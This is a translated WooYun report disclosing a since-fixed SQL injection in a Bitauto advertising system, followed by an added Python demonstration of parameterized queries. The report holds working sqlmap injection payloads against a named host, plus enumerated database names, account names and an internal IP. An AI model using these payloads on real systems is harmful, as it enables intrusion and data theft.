
Vulnerability summary

Defect ID: wooyun-2015-097947

Title: SQL injection vulnerability in a Bitauto (易车) business system, 66 databases

Vendor: 易车 (Bitauto)

Author: 几何黑店

Submitted: 2015-02-22 12:04

Fixed: 2015-04-13 16:58

Published: 2015-04-13 16:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-22: Details sent to the vendor, awaiting vendor handling
2015-02-22: Vendor has confirmed; details visible to the vendor only
2015-03-04: Details disclosed to core white hats and domain experts
2015-03-14: Details disclosed to regular white hats
2015-03-24: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public

Brief description:

Happy New Year, hand over the red envelope.

Detailed description:

[screenshot: QQ图片20150221222644.png]

[screenshot: QQ图片20150221220640.png]


Injection point: http://dmp.op.cig.com.cn/report/area/index?t=1&deep=
Parameter: t=1

Proof of vulnerability:

---
Parameter: t (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: t=1' AND 4647=4647 AND 'cPDg'='cPDg&deep=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: t=1' AND (SELECT 9734 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (CASE WHEN (9734=9734) THEN 1 ELSE 0 END)),0x717a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'khji'='khji&deep=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: t=1' AND SLEEP(5) AND 'buEq'='buEq&deep=
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [66]:
[*] bitauto_data_stat
[*] bitsmart
[*] carsv2222
[*] cheyisou
[*] cig_achievement
[*] cig_ad_sys_t
[*] cig_adsense
[*] cig_adsense_report
[*] cig_audience_package
[*] cig_blog_department
[*] cig_blog_easyad
[*] cig_crm
[*] cig_crmv2
[*] cig_institution
[*] cig_jiesuan
[*] cig_luxgen
[*] cig_mrm
[*] cig_mst
[*] cig_op
[*] cig_opv2
[*] cig_survey
[*] cig_tracking_report
[*] cig_urlanalytic
[*] cigdc_attribute
[*] cigdc_buffer
[*] cigdc_dealer
[*] cigdc_logmanage
[*] cigdc_monitor
[*] cigdc_page
[*] cigdc_pool
[*] cigdc_private_package
[*] cigdc_report
[*] cigdc_server
[*] cigdc_system
[*] cigdc_tagmanager
[*] cigdc_tagmanager_report
[*] cigdc_tagmanager_url
[*] cigdc_tagmanager_url_result
[*] cigdc_task
[*] cigdc_yiche
[*] cigdc_yiche_tuisong
[*] diamond
[*] diamond-production
[*] easyad_buffer
[*] easyad_mattar
[*] easyad_monitor
[*] easyad_report
[*] easyad_system
[*] easyad_task
[*] iBitAutotemp
[*] information_schema
[*] innodb
[*] mysql
[*] performance_schema
[*] test
[*] testdb
[*] visitor_bqcx
[*] web_db
[*] yiche_ad_sys
[*] yiche_ad_sys_t
[*] yiche_auto_index
[*] yiche_dad
[*] yiche_dad_report
[*] yiche_dad_t
[*] yiche_domainuser
[*] yiche_tag


[*] ''@'AD_DB01'
[*] ''@'localhost'
[*] 'audience_package'@'%'
[*] 'auto_index_car'@'%'
[*] 'auto_index_data'@'%'
[*] 'auto_index_web'@'%'
[*] 'bitsmart'@'%'
[*] 'cig_ad_sys_t'@'%'
[*] 'cig_adsense'@'%'
[*] 'cig_adsense_car'@'%'
[*] 'cig_adsense_repo'@'%'
[*] 'cig_crmv2'@'%'
[*] 'cigdc_logmanage'@'%'
[*] 'cigdc_server'@'%'
[*] 'cigdc_tagmanager'@'%'
[*] 'cigdc_task'@'%'
[*] 'cigdc_yiche'@'%'
[*] 'cigdc_yiche_api'@'%'
[*] 'dad_manager'@'%'
[*] 'dad_report_web'@'%'
[*] 'dad_test'@'%'
[*] 'easyad_system'@'%'
[*] 'easyad_xiaol'@'%'
[*] 'mlmuser'@'%'
[*] 'opv2'@'%'
[*] 'private_package'@'%'
[*] 'Repluser'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.1.141'
[*] 'root'@'::1'
[*] 'root'@'AD_DB01'
[*] 'root'@'localhost'
[*] 'user_cig_opv2'@'%'
[*] 'user_easyad_syst'@'%'
[*] 'web_db'@'192.168.1.141'
[*] 'yiche_ad_sys'@'%'
[*] 'yiche_ad_sys_t'@'%'
[*] 'yiche_dad_report'@'%'
[*] 'yiche_tag'@'%'


Database: cigdc_yiche
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| StyleD | 3864110 |
| StylePropertyValue | 3725077 |
| StyleJoinColor | 96574 |
| entitylogitem | 88680 |
| dealer | 53512 |
| dealerMap | 42141 |
| dealerBrand | 41561 |
| Style | 36029 |
| Style2 | 36029 |
| a_style_to_model | 35728 |
| tbl | 34109 |
| WhiteCoverImages | 19194 |
| ModelColor | 12132 |
| yearpropertyvalue | 7588 |
| Model | 2599 |
| a_model_to_brand | 2582 |
| a_model_to_make | 2582 |
| cx_model | 1947 |
| area | 1891 |
| ModelAutohome | 1631 |
| yichebaa_brandforumlist | 852 |
| cx_make | 639 |
| StyleProperty | 420 |
| cx_masterbrand | 397 |
| Make | 293 |
| a_make_to_brand | 287 |
| tag_tree | 264 |
| MasterBrand | 254 |
| Manufacturer | 241 |
| temp | 53 |
| StylePropertyGroup | 31 |
| cx_url_rule | 24 |
| ModelLevel | 19 |
| Country | 15 |
| tag_path | 14 |
| yichebaa | 13 |
| emaillogreceiver | 11 |
| path_car | 11 |
| `Use` | 10 |
| ModelBodyForm | 10 |
| SyncDataReceiver | 4 |
+-------------------------+---------+

Fix recommendation:

You know what to do.

Copyright notice: please credit 几何黑店@乌云 when reposting.
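The fix the author leaves unstated is parameter binding. As an added illustration that is not part of the original report, the Python below uses an in-memory SQLite table as a constructed stand-in for the MySQL backend (the `area` table, its rows and the two lookup functions are assumptions) to show why the report's boolean-based payload for `t` changes the result of a string-built query, and why the same value is inert once it is bound as a parameter.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the report's area lookup (SQLite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE area (id INTEGER, t TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO area VALUES (?, ?, ?)",
        [(1, "1", "Beijing"), (2, "2", "Shanghai")],
    )
    return conn


def vulnerable_lookup(conn, t):
    """String concatenation: the value of t becomes part of the SQL text."""
    sql = "SELECT name FROM area WHERE t = '" + t + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, t):
    """Parameter binding: t is passed as data and cannot alter the statement."""
    return [row[0] for row in conn.execute("SELECT name FROM area WHERE t = ?", (t,))]


# Value of t taken verbatim from the boolean-based payload in the sqlmap output
# above, plus a constructed "false" variant (4647=4648) to show the differential
# that makes blind injection observable.
TRUE_PAYLOAD = "1' AND 4647=4647 AND 'cPDg'='cPDg"
FALSE_PAYLOAD = "1' AND 4647=4648 AND 'cPDg'='cPDg"


def demo():
    conn = build_db()
    return {
        # Concatenated query: a true condition returns the row for t='1',
        # a false one returns nothing -> the attacker-controlled condition
        # is being evaluated by the database.
        "vuln_true": vulnerable_lookup(conn, TRUE_PAYLOAD),
        "vuln_false": vulnerable_lookup(conn, FALSE_PAYLOAD),
        # Bound parameter: no row has t equal to the whole payload string,
        # so the same input simply matches nothing.
        "safe_true": safe_lookup(conn, TRUE_PAYLOAD),
        "normal": safe_lookup(conn, "1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The same contrast holds for the error-based and time-based payloads in the report: each depends on the value of `t` being spliced into SQL text, and binding it as a parameter removes that path regardless of which MySQL function the payload calls.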


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-02-22 17:09

Vendor reply:

Many thanks for your help to Bitauto; we will deal with it as soon as possible.

Latest status:

2015-03-02: Fixed, many thanks for your support of Bitauto.